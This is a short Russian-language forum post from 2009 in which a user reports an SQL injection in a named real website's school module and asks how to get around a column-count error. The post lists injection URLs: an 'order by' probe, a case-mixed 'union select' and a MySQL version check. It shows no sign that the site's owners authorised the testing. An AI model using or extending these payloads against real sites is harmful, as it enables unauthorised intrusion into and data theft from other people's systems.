11.06.2009, 15:09
|
|
Постоянный
Регистрация: 29.01.2009
Сообщений: 333
С нами:
9095366
Репутация:
298
|
|
есть sql-inj
http://www.yetinepal.com/modules/school/school.php?id=2+order+by+1
количество столбцов - 1
пробую union select
http://www.yetinepal.com/modules/school/school.php?id=2+uNion+sElecT+1
получаем 1222 - The used SELECT statements have a different number of columns
как такие ситуации можно обойти?
P.s. мускул пятый
http://www.yetinepal.com/modules/school/school.php?id=2+and+substring(version(),1,1)=5
|
|
|